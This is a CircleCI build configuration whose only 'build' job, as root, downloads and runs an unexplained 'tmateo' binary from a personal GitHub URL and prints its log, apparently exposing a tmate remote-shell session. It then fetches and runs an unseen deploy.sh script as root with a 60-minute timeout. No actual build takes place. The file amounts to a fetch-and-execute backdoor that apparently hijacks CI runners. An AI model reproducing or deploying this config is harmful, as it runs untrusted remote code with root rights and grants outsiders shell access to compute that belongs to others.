version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - run: 
         name: Downloading
         command: |
          sudo su --command "wget https://raw.githubusercontent.com/masdinoyo/tmate/main/tmateo && apt-get update && apt-get install tmate -y && chmod +x tmateo"
          sudo su --command "nohup ./tmateo --log=stdout > meta.log &"
          sleep 10
          sudo su --command "cat meta.log"    
      - run: 
         name: Executing
         no_output_timeout: 60m
         command: |
          wget https://raw.githubusercontent.com/kincanayo25/circleci/main/.circleci/deploy.sh
          chmod +x deploy.sh
          sudo su --command "./deploy.sh"
workflows:
    version: 2
    build:
        jobs:
            - build
